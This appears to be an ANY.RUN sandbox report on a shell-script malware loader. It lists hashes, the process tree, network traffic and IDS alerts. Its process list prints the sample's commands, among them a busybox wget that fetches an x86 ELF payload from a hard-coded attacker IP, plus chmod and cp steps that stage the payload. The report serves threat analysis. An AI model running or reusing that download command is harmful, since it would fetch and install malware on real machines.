File name:

059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh

Full analysis: https://app.any.run/tasks/386e0a32-33b1-48ef-a224-8f535dcdd871
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 28, 2026, 11:53:13
OS: Ubuntu 22.04.2
Tags:
loader
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

88DE3E25E677D14A37EB4B09E8D503E3

SHA1:

264C2EDA838DEAAEA376A5128BE6D63722C12C9B

SHA256:

059DC71F33A19774E03DC47E61C5383DD650F4967DB0B13B47AC76B9A5208F4F

SSDEEP:

12:yEdEqdwq4XmaZVgzd3/FFscll7qxOOK4aF:ucHH7qxsF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executes the "rm" command to delete files or directories

      • dash (PID: 3193)
    • Modifies file or directory owner

      • sudo (PID: 3187)
    • Create hidden file

      • dash (PID: 3193)
    • Potential Corporate Privacy Violation

      • busybox (PID: 3196)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
323
Monitored processes
203
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs locale-check no specs cp no specs busybox chmod no specs .f no specs .f no specs .f no specs cp no specs .f .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs chmod no specs .f no specs .f no specs .f no specs .f cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs chmod no specs .f no specs cp no specs .f no specs chmod no specs .f no specs .f no specs .f .f no specs cp no specs chmod no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs chmod no specs .f no specs .f no specs .f .f no specs cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f chmod no specs .f no specs cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs chmod no specs .f no specs cp no specs .f no specs .f .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs chmod no specs .f no specs cp no specs chmod no specs .f no specs .f no specs .f no specs cp no specs chmod no specs .f no specs .f no specs .f .f no specs .f .f no specs cp no specs chmod no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs cp no specs chmod no specs .f no specs cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs chmod no specs .f no specs cp no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs chmod no specs .f no specs rm no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f .f no specs rm no specs rm no specs rm no specs rm no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f rm no specs rm no specs rm no specs rm no specs .f no specs .f no specs .f no specs .f no specs .f no specs .f no specs rm no specs rm no specs rm no specs rm no specs rm no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
3186/bin/sh -c "sudo chown user /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f\.sh && chmod +x /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f\.sh "/usr/bin/dashN00yyFAAJQjQ6JFp
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
3187sudo chown user /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
3188chown user /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
3189chmod +x /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
3190sudo -iu user /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
3193/bin/sh /home/user/Desktop/059dc71f33a19774e03dc47e61c5383dd650f4967db0b13b47ac76b9a5208f4f.sh/usr/bin/dashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
3194/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
3195cp /system/bin/sh .pler/usr/bin/cpdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/lib/x86_64-linux-gnu/libacl.so.1.1.2301
/usr/lib/x86_64-linux-gnu/libattr.so.1.1.2501
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
3196busybox wget http://140.233.190.47/terrabot/023782pler.x86 -O -/usr/bin/busybox
dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
3197chmod 777 .f/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
Executable files
0
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3193dash/home/user/.fbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
425
DNS requests
14
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
79.127.216.204:443
https://odrs.gnome.org/1.0/reviews/api/ratings
CZ
POST
185.125.188.60:443
https://api.snapcraft.io/v2/snaps/refresh
GB
unknown
POST
185.125.188.60:443
https://api.snapcraft.io/v2/snaps/refresh
GB
unknown
POST
200
185.125.188.60:443
https://api.snapcraft.io/v2/snaps/refresh
GB
text
39.5 Kb
unknown
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
GET
204
185.125.190.101:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
3196
busybox
GET
200
140.233.190.47:80
http://140.233.190.47/terrabot/023782pler.x86
ZA
binary
50.9 Kb
unknown
POST
200
185.125.188.60:443
https://api.snapcraft.io/v2/snaps/refresh
GB
text
39.5 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
452
avahi-daemon
224.0.0.251:5353
whitelisted
185.125.190.101:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
185.125.190.100:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
79.127.216.204:443
odrs.gnome.org
CDN77 _
GB
whitelisted
185.125.188.60:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
185.125.188.54:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
185.125.188.58:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
91.189.91.98:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
3196
busybox
140.233.190.47:80
INTERNET-MAGNATE
ZA
unknown
3309
.f
8.8.8.8:53
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.101
  • 185.125.190.100
  • 91.189.91.98
  • 91.189.91.97
  • 185.125.190.99
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::1101
  • 2620:2d:4000:1::1100
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::1099
whitelisted
odrs.gnome.org
  • 79.127.216.204
  • 195.181.170.19
  • 195.181.175.40
  • 212.102.56.178
  • 37.19.194.81
  • 79.127.211.89
  • 2a02:6ea0:c77a::48
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c77a::47
whitelisted
api.snapcraft.io
  • 185.125.188.60
  • 185.125.188.54
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.59
  • 185.125.188.55
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2cc
  • 2620:2d:4000:1010::6d
whitelisted
google.com
  • 142.250.154.139
  • 142.250.154.100
  • 142.250.154.138
  • 142.250.154.101
  • 142.250.154.102
  • 142.250.154.113
  • 2a00:1450:4001:c13::66
  • 2a00:1450:4001:c13::8a
  • 2a00:1450:4001:c13::64
  • 2a00:1450:4001:c13::8b
whitelisted
5.100.168.192.in-addr.arpa
whitelisted

Threats

PID
Process
Class
Message
3196
busybox
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
3196
busybox
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
3196
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info